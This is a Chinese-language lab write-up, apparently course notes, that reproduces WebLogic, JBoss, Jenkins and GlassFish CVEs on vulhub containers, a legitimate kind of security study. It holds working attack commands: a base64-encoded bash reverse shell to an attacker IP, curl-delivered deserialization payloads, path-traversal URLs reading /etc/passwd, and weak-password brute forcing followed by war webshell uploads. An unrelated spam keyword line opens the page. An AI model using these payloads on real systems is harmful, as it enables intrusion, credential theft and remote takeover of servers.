国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish

這篇具有很好參考價(jià)值的文章主要介紹了第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。


文章僅供學(xué)習(xí)交流,一些漏洞沒(méi)能復(fù)現(xiàn)出來(lái)(菜就多練),日后來(lái)興趣再補(bǔ)坑(大概~)


視頻鏈接:?

【小迪安全】紅藍(lán)對(duì)抗 | 網(wǎng)絡(luò)攻防 | V2022全棧培訓(xùn)_嗶哩嗶哩_bilibilihttps://www.bilibili.com/video/BV1pQ4y1s7kH

目錄

一、知識(shí)點(diǎn)

1、中間件-Weblogic-CVE

2、中間件-JBoos-CVE

3、中間件-Jenkins-CVE

4、中間件-GlassFish-CVE

二、章節(jié)內(nèi)容

1、常見(jiàn)中間件的安全測(cè)試

2、中間件安全測(cè)試流程

3、應(yīng)用服務(wù)安全測(cè)試流程

三、案例演示

1、中間件-Weblogic-CVE&反序列化&遠(yuǎn)程執(zhí)行

(1)?CVE-2017-3506? 遠(yuǎn)程代碼執(zhí)行漏洞

(2)CVE-2018-2893? 反序列化漏洞

(3)CVE-2018-3245? 遠(yuǎn)程代碼執(zhí)行漏洞

(4)CVE-2020-14882 未授權(quán)命令執(zhí)行漏洞

(5)CVE-2021-2394 反序列化漏洞 (復(fù)現(xiàn)失?。?/p>

2、中間件-JBoos-CVE&弱口令

(1)CVE-2017-12149??反序列化遠(yuǎn)程代碼執(zhí)行漏洞

(2)CVE-2017-7504??反序列化命令執(zhí)行漏洞

(3)弱口令 未授權(quán)訪問(wèn)

2、中間件-Jenkins-CVE

?????????(1)CVE-2017-1000353? 遠(yuǎn)程代碼執(zhí)行漏洞

? ? ? ? ?(2)CVE-2018-1000861? 遠(yuǎn)程命令執(zhí)行漏洞 (未完成)

? ? ? ? ?(3)CVE-2019-100300? 遠(yuǎn)程代碼執(zhí)行漏洞(條件苛刻)

3、中間件-GlassFish-CVE

? ? ? ? ?(1)CVE-2017-1000028 任意文件讀取漏洞

? ? ? ? ?(2)簡(jiǎn)單口令&Getshell (getshell失敗)

四、總結(jié)


相關(guān)工具下載

鏈接:https://pan.baidu.com/s/1BcDQ1c1kt4M0JChMQLoH1Q?
提取碼:idoa

一、知識(shí)點(diǎn)

中間件及框架列表:
IIS , Apache Nginx , Tomcat Docker , Weblogic , JBoos WebSphere ,
Jenkins , GlassFish , Jira , Struts2 , Laravel Solr , Shiro , Thinkphp ,
Spring Flask , jQuery

本節(jié)課程涉及以下中間件案例演示:

1、中間件-Weblogic-CVE

2、中間件-JBoos-CVE

3、中間件-Jenkins-CVE

4、中間件-GlassFish-CVE

二、章節(jié)內(nèi)容

1、常見(jiàn)中間件的安全測(cè)試

(1)配置不當(dāng)-解析&弱口令

(2)安全機(jī)制-特定安全漏洞

(3)安全機(jī)制-弱口令爆破攻擊

(4)安全應(yīng)用-框架特定安全漏洞

2、中間件安全測(cè)試流程

(1)判斷中間件信息-名稱&版本&三方

(2)判斷中間件問(wèn)題-配置不當(dāng)&公開(kāi)漏洞

(3)判斷中間件利用-弱口令&EXP&框架漏洞

3、應(yīng)用服務(wù)安全測(cè)試流程

(1)判斷服務(wù)開(kāi)放情況-端口掃描&組合應(yīng)用等

(2)判斷服務(wù)類型歸屬-數(shù)據(jù)庫(kù)&文件傳輸&通訊等

(3)判斷服務(wù)利用方式-特定漏洞&未授權(quán)&弱口令等

三、案例演示

1、中間件-Weblogic-CVE&反序列化&遠(yuǎn)程執(zhí)行

????????簡(jiǎn)介:Weblogic 是 Oracle 公司推出的一個(gè)基于JAVAEE架構(gòu)的中間件,能為JAVA程序提供開(kāi)發(fā)、集成、部署和管理等功能。

注:由于下面的幾個(gè)漏洞大部分可直接用集成工具一鍵探測(cè)并利用,因此下面只介紹漏洞詳情,就不復(fù)現(xiàn)了,下載鏈接如下:

WeblogicTool-GUI漏洞利用工具,支持漏洞檢測(cè)、命令執(zhí)行、內(nèi)存馬注入、密碼解密等

此工具需要在java8環(huán)境下運(yùn)行,檢查java版本

java -version

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

版本一致后,解壓下載工具的壓縮包,在此目錄打開(kāi)cmd,輸入命令即可打開(kāi)GUI界面(若不慎關(guān)掉cmd界面會(huì)退出程序)

java -jar?WeblogicTool_1.3.jar

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

詳細(xì)使用教程在下載鏈接中有,可自行研究

(1)?CVE-2017-3506? 遠(yuǎn)程代碼執(zhí)行漏洞

簡(jiǎn)介:

????????Weblogic的WLS Security組件對(duì)外提供webservice服務(wù) ,里面的XMLDecoder是用來(lái)解析用戶傳入的數(shù)據(jù),解析的過(guò)程中,由于其中的WorkContextXmlInputAdapter類沒(méi)有限制傳入的數(shù)據(jù),會(huì)出現(xiàn)反序列化漏洞,導(dǎo)致可執(zhí)行任意命令,因此可被攻擊者構(gòu)造惡意代碼拿到權(quán)限。

影響版本:

????????OracleWebLogic Server10.3.6.0.0

????????OracleWebLogic Server12.1.3.0.0

????????OracleWebLogic Server12.2.1.1.0

????????OracleWebLogic Server12.2.1.2.0

判斷方法:

????????訪問(wèn)以下目錄,頁(yè)面有返回服務(wù)信息則說(shuō)明或許存在漏洞

/wls-wsat/CoordinatorPortType

/wls-wsat/RegistrationPortTypeRPC

/wls-wsat/ParticipantPortType

/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11

/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11

/wls-wsat/RegistrationRequesterPortType11

(2)CVE-2018-2893? 反序列化漏洞

簡(jiǎn)介:

? ? ? ? 此漏洞產(chǎn)生于WebLogic T3服務(wù),T3協(xié)議在WebLogic Server和客戶端間承當(dāng)傳輸數(shù)據(jù)和通信作用,Weblogic開(kāi)放端口后T3會(huì)默認(rèn)開(kāi)啟,WebLogic服務(wù)存在的漏洞允許未經(jīng)身份驗(yàn)證的攻擊者通過(guò)T3獲得服務(wù)器權(quán)限。

影響版本:

????????WebLogic 10.3.6.0

????????WebLogic 12.1.3.0

????????WebLogic 12.2.1.2

????????WebLogic 12.2.1.3

(3)CVE-2018-3245? 遠(yuǎn)程代碼執(zhí)行漏洞

簡(jiǎn)介:

????????該漏洞和CVE-2018-2893類似,通過(guò)JRMP協(xié)議利用RMI機(jī)制的缺陷,進(jìn)行遠(yuǎn)程代碼執(zhí)行漏洞的利用。攻擊者可構(gòu)造惡意代碼并通過(guò)T3進(jìn)行反序列化實(shí)現(xiàn)遠(yuǎn)程代碼執(zhí)行獲取系統(tǒng)權(quán)限。

影響版本:

????????Weblogic 10.3.6.0

????????Weblogic 12.1.3.0

????????Weblogic 12.2.1.3

判斷方法:

????????CVE-2018-3245-PoC

(4)CVE-2020-14882 未授權(quán)命令執(zhí)行漏洞

簡(jiǎn)介:

? ? ? ? 此漏洞可被未經(jīng)身份驗(yàn)證的攻擊者通過(guò)構(gòu)造特殊的GET請(qǐng)求進(jìn)行攻擊,

影響版本:

????????Oracle Weblogic Server 10.3.6.0.0

????????Oracle Weblogic Server 12.1.3.0.0

????????Oracle Weblogic Server 12.2.1.3.0

????????Oracle Weblogic Server 12.2.1.4.0

????????Oracle Weblogic Server 14.1.1.0.0

WeblogicTool可以識(shí)別存在漏洞,但是利用這塊用不了,嘗試手工復(fù)現(xiàn)下

打開(kāi)vulhub,進(jìn)入/weblogic/CVE-2020-14882,啟動(dòng)容器

打開(kāi)訪問(wèn)界面http://192.168.190.153:7001/console

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

輸入poc,可直接進(jìn)入后臺(tái),說(shuō)明存在漏洞

http://192.168.190.153:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29

下載shell腳本,執(zhí)行命令

About CVE-2020-14882_ALL綜合利用工具,支持命令回顯檢測(cè)、批量命令回顯、外置xml無(wú)回顯命令執(zhí)行等功能

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

(5)CVE-2021-2394 反序列化漏洞 (復(fù)現(xiàn)失敗)

簡(jiǎn)介:

? ? ? ? 此為WebLogic組件存在高危漏洞,漏洞主要是FilterExtractor的readExternal方法使用不當(dāng),使得生成 MethodAttributeAccessor的時(shí)候不會(huì)受到黑名單的限制。成功利用該漏洞的攻擊者可以獲取WebLogic Server管理權(quán)限。

影響版本:

????????Oracle WebLogic Server 10.3.6.0.0

????????Oracle WebLogic Server 12.1.3.0.0

????????Oracle WebLogic Server 12.2.1.3.0

????????Oracle WebLogic Server 12.2.1.4.0

????????Oracle WebLogic Server 14.1.1.0.0

這里用vulhub的CVE-2020-14882的漏洞環(huán)境來(lái)代替(版本一致)

復(fù)現(xiàn)失敗,poc運(yùn)行報(bào)錯(cuò)╮(╯▽╰)╭

2、中間件-JBoos-CVE&弱口令

簡(jiǎn)介:

????????Jboss 通常占用的端口是 1098,1099,4444,4445,8080,8009,8083,8093 這

幾個(gè),Red Hat JBoss Application Server 是一款基于 JavaEE 的開(kāi)源應(yīng)用服務(wù)器。

(1)CVE-2017-12149??反序列化遠(yuǎn)程代碼執(zhí)行漏洞

簡(jiǎn)介:

????????JBOSS Application Server是一個(gè)基于JE22的開(kāi)放源代碼的應(yīng)用服務(wù)器,在這個(gè)漏洞中,發(fā)現(xiàn) HTTP Invoker 的 ReadOnlyAccessFilter 中的 doFilter 方法不限制它執(zhí)行反序列化的類,因此允許攻擊者通過(guò)構(gòu)建特殊的的序列化數(shù)據(jù)執(zhí)行任意代碼,無(wú)需用戶驗(yàn)證即可獲得服務(wù)器的控制權(quán)。

影響版本:

????????5.x和6.x版本的JBOSSAS

?打開(kāi)vulhub,進(jìn)入/jboss/CVE-2017-12149,啟動(dòng)容器,訪問(wèn)url

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

訪問(wèn)/invoker/readonly,若出現(xiàn)500狀態(tài)碼說(shuō)明存在漏洞

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

在kali下載利用利用工具,下載鏈接-github

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

按照要求替換Java版本為1.8.0_20,以root在kali運(yùn)行以下命令,該命令是下載Java壓縮包解壓并替換本地Java包過(guò)程

# cd /opt
# curl http://www.joaomatosf.com/rnp/java_files/jdk-8u20-linux-x64.tar.gz -o jdk-8u20-linux-x64.tar.gz 
# tar zxvf jdk-8u20-linux-x64.tar.gz
# rm -rf /usr/bin/java*
# ln -s /opt/jdk1.8.0_20/bin/j* /usr/bin
# java -version
  java version "1.8.0_20" 

版本替換好后,進(jìn)入前邊git下載的文件目錄,編譯和執(zhí)行應(yīng)用程序

javac VulnerableHTTPServer.java -XDignore.symbol.file
java -cp .:commons-collections-3.2.1.jar VulnerableHTTPServer

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

編譯一個(gè)ser文件,填寫(xiě)ip和端口信息

//編譯 example1,該示例適用于類路徑中具有 commons-collections3.2.1 和 JRE < 8u72 的應(yīng)用程序
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
//生成ser文件。以下192.168.190.140是攻擊機(jī)ip,4444是要監(jiān)聽(tīng)的端口
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.1.192:4444

kali監(jiān)聽(tīng)4444端口,同時(shí)使用curl反彈shell,可以看到反彈成功

curl http://192.168.190.153:8080/invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

(2)CVE-2017-7504??反序列化命令執(zhí)行漏洞

簡(jiǎn)介:

????????Jboss AS 4.X及之前的版本中的JbossMQ實(shí)現(xiàn)過(guò)程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在安全漏洞。遠(yuǎn)程攻擊者可借助特制的序列化數(shù)據(jù)利用該漏洞執(zhí)行任意代碼。

影響版本:

????????JBoss AS<=4.x

?打開(kāi)vulhub,進(jìn)入/jboss/CVE-2017-7504,啟動(dòng)容器,訪問(wèn)url

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

訪問(wèn)/jbossmq-httpil/HTTPServerILServlet,能成功訪問(wèn)并出現(xiàn)以下頁(yè)面說(shuō)明存在漏洞

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

和CVE-2017-12149反序列化漏洞利用過(guò)程一樣,使用curl反彈shell,有回顯即為成功

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

(3)弱口令 未授權(quán)訪問(wèn)

簡(jiǎn)介:

? ? ? ? 部署jboss時(shí)管理員有時(shí)會(huì)忽略修改密碼導(dǎo)致弱口令,又或者無(wú)密碼可以直接訪問(wèn)后臺(tái)導(dǎo)致未授權(quán)訪問(wèn)。

影響版本:

? ? ? ? 全版本

上邊打開(kāi)的CVE漏洞靶場(chǎng)可以直接用來(lái)復(fù)現(xiàn),這里以CVE-2017-7504為例

訪問(wèn)/jmx-console/,顯示輸入賬密,嘗試默認(rèn)密碼:admin/admin,可進(jìn)入后臺(tái)

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

找到deployment(部署界面),進(jìn)入找到void addurl()添加文件,在ParamValue下輸入打包好的一句話木馬文件

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

這里上傳的一句話木馬可以用godzilla生成,然后再壓縮修改后綴為war,和上節(jié)課思路一樣,傳送門:第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx

?打開(kāi)kali的nginx,將shell.war放入網(wǎng)站目錄(路徑/var/www/html)

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

寫(xiě)入url訪問(wèn)路徑,點(diǎn)擊Invoke,跳轉(zhuǎn)到上傳成功界面,可以在后臺(tái)主頁(yè)查看是否上傳成功

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

訪問(wèn)/shell/目錄,可看到上傳的文件,用godzilla成功連接

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

????????復(fù)現(xiàn)這里有一些問(wèn)題說(shuō)一下,首先,假如使用默認(rèn)密碼登錄失敗,想要批量測(cè)試其它弱口令,可以嘗試用burpsuite爆破密碼。由抓包可見(jiàn)賬密傳輸使用base64編碼且為admin:admin格式,只要字典給力爆破不在話下

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

????????其次,實(shí)測(cè)用蟻劍和自制的一句話木馬是連接不上的,可以用godzilla或者冰蝎代替,個(gè)人更推薦godzilla因?yàn)樘峁┥梢痪湓捘抉R功能

3、中間件-Jenkins-CVE

簡(jiǎn)介:

? ? ? ?Jenkins 是一個(gè)用 Java 編寫(xiě)的開(kāi)源自動(dòng)化工具,是基于Java開(kāi)發(fā)的一種持續(xù)集成工具,用于監(jiān)控持續(xù)重復(fù)的工作。默認(rèn)端口:8080

(1)CVE-2017-1000353? 遠(yuǎn)程代碼執(zhí)行漏洞

簡(jiǎn)介:

????????該漏洞存在于使用HTTP協(xié)議的雙向通信通道的具體實(shí)現(xiàn)代碼中,Jenkins利用此通道來(lái)接收命令,惡意攻擊者可以構(gòu)造惡意攻擊參數(shù)遠(yuǎn)程執(zhí)行命令,從而獲取系統(tǒng)權(quán)限,造成數(shù)據(jù)泄露。

影響版本:

????????所有Jenkins主版本均受到影響(包括<=2.56版本)
????????所有Jenkins LTS 均受到影響(包括<=2.46.1版本)

?打開(kāi)vulhub,進(jìn)入/Jenkins/CVE-2017-1000353,啟動(dòng)容器,訪問(wèn)url

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

下載好payload生成工具,下載鏈接(注意,需下載CVE-2017-1000353-1.1-SNAPSHOT-all.jar和exploit.py兩個(gè)文件)

在當(dāng)前頁(yè)面打開(kāi)cmd,輸入以下命令,kali開(kāi)啟端口監(jiān)聽(tīng)

//生成序列化字符串poc.ser,這里反彈shell命令需要用base編碼
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar poc.ser "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5MC4xNDAvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}"
//給靶機(jī)發(fā)送數(shù)據(jù)包,執(zhí)行命令
python exploit.py http://192.168.190.153:8080 poc.ser

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

注意,實(shí)測(cè)java版本需要1.8.0_291才行,否則反彈不了shell

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

反彈成功

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

(2)CVE-2018-1000861? 遠(yuǎn)程命令執(zhí)行漏洞 (未完成)

簡(jiǎn)介:

? ? ? ? jenkins使用Stapler開(kāi)發(fā),在stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java 中使用的 Stapler Web 框架中存在一個(gè)代碼執(zhí)行漏洞,該漏洞允許攻擊者通過(guò)訪問(wèn)構(gòu)建特殊的 URL 來(lái)調(diào)用 Java 對(duì)象上的某些方法獲取權(quán)限。

影響版本:

????????Jenkins主版本 <= 2.153
????????Jenkins LTS版本 <= 2.138.3

整半天復(fù)現(xiàn)的腳本運(yùn)行不了,學(xué)習(xí)思路后暫時(shí)放棄╮(╯_╰)╭

(3)CVE-2019-100300? 遠(yuǎn)程代碼執(zhí)行漏洞(條件苛刻)

簡(jiǎn)介:

? ? ? ? 在src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java 中存在一個(gè)沙盒繞過(guò)漏洞,該漏洞允許能提供沙盒腳本的攻擊者在 Jenkins master JVM 上執(zhí)行任意代碼。

影響版本:

????????Pipeline: Declarative 插件 <= 1.3.4
????????Pipeline: Groovy 插 件 <= 2.61
????????Script Security 插 件 <= 1.49

該漏洞需要提前知道管理員用戶賬號(hào)和密碼才能進(jìn)行利用,利用價(jià)值不高

3、中間件-GlassFish-CVE

簡(jiǎn)介:

????????GlassFish 是一款強(qiáng)健的商業(yè)兼應(yīng)用服務(wù)器,達(dá)到產(chǎn)品級(jí)質(zhì)量,可免費(fèi)用于開(kāi)發(fā)、部署和重新分發(fā)。開(kāi)發(fā)者可以免費(fèi)獲得源代碼,還可以對(duì)代碼進(jìn)行更改。默認(rèn)端口為4848。

(1)CVE-2017-1000028 任意文件讀取漏洞

簡(jiǎn)介:

????????Oracle 的 GlassFish Server Open Source Edition 4.1 容易受到經(jīng)過(guò)身份驗(yàn)證和未經(jīng)身份驗(yàn)證的目錄遍歷漏洞的攻擊,可以通過(guò)發(fā)出特制的 HTTP GET 請(qǐng)求來(lái)利用該漏洞。

影響版本:

???????GlassFish?<= 4.1.2

打開(kāi)vulhub,進(jìn)入/glassfish/4.1.0/目錄啟動(dòng)容器,訪問(wèn)http://192.168.190.153:4848

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

訪問(wèn)以下url,可得到靶機(jī)為linux或windows下的賬號(hào)密碼存儲(chǔ)位置。java中會(huì)把%c0%ae解析為\uC0AE后轉(zhuǎn)義為字符.(點(diǎn)), 所以可以利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/向上跳轉(zhuǎn)目錄,達(dá)到目錄穿越讀取任意文件的效果。

linux(相當(dāng)于訪問(wèn)/theme/META_INF/../../../../../../../../../../windows/win.ini):

https://192.168.190.153:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd windows(相當(dāng)于訪問(wèn)/theme/META_INF/../../../../../../../../../../etc/passwd):

https://192.168.190.153:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

(2)簡(jiǎn)單口令&Getshell (getshell失?。?/h6>

簡(jiǎn)介:

????????部署Glassfish時(shí)管理員有時(shí)會(huì)忽略修改密碼導(dǎo)致弱口令,又或者無(wú)密碼可以直接訪問(wèn)后臺(tái)導(dǎo)致未授權(quán)訪問(wèn)。

影響版本:

????????全版本?

上面的vulhub環(huán)境保留,訪問(wèn)url是一個(gè)登錄界面,因此我們可以用bp爆破密碼,抓包添加到intruder,導(dǎo)入字典批量爆破

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

可以看到爆破后有一個(gè)頁(yè)面狀態(tài)碼和字符串長(zhǎng)度不一樣,嘗試該賬密可以成功登錄后臺(tái)

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

點(diǎn)擊左邊的Applications后點(diǎn)擊Deploy,這里有文件上傳路徑點(diǎn),上傳godzilla生成的jsp文件壓縮改為war后綴,

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

看其他復(fù)現(xiàn)博客這里需要訪問(wèn)https://192.168.190.153:8080/shell/shell.jsp,但是我這訪問(wèn)不了也沒(méi)報(bào)錯(cuò),網(wǎng)上也沒(méi)有這種情況的解析,只好就此作罷

一般的話,這里能訪問(wèn)到直接godzilla連接即可

http://192.168.190.153:8080/[Context Root]/[war包內(nèi)的filename]

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

四、總結(jié)

? ? ? ? 這節(jié)課也是以CVE漏洞復(fù)現(xiàn)為主,復(fù)現(xiàn)了一些比較常見(jiàn)的中間件漏洞。有一說(shuō)一漏洞復(fù)現(xiàn)非常艱難,大體上都是環(huán)境配置問(wèn)題。好在復(fù)現(xiàn)成功后非常有成就感,也能在不知不覺(jué)中提高動(dòng)手能力。

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux

第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish,網(wǎng)絡(luò)安全,安全,java,web安全,linux文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-827650.html

到了這里,關(guān)于第60天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&Weblogic&&Jboss&Jenkins&GlassFish的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 中間件安全-CVE復(fù)現(xiàn)&Weblogic&Jenkins&GlassFish漏洞復(fù)現(xiàn)

    中間件安全-CVE復(fù)現(xiàn)&Weblogic&Jenkins&GlassFish漏洞復(fù)現(xiàn)

    中間件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,F(xiàn)lask,jQuery等 1、中間件-Weblogic安全 2、中間件-JBoos安全 3、中間件-Jenkins安全 4、中間件-GlassFish安全 常見(jiàn)中間件的安全測(cè)試: 1、配置

    2024年02月08日
    瀏覽(19)
  • 中間件安全-CVE復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx漏洞復(fù)現(xiàn)

    中間件安全-CVE復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx漏洞復(fù)現(xiàn)

    中間件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,F(xiàn)lask,jQuery等 1、中間件-IIS-短文件解析藍(lán)屏等 2、中間件-Nginx-文件解析命令執(zhí)行等 3、中間件-Apache-RCE目錄遍歷文件解析等 4、中間件

    2024年02月07日
    瀏覽(22)
  • 中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn)

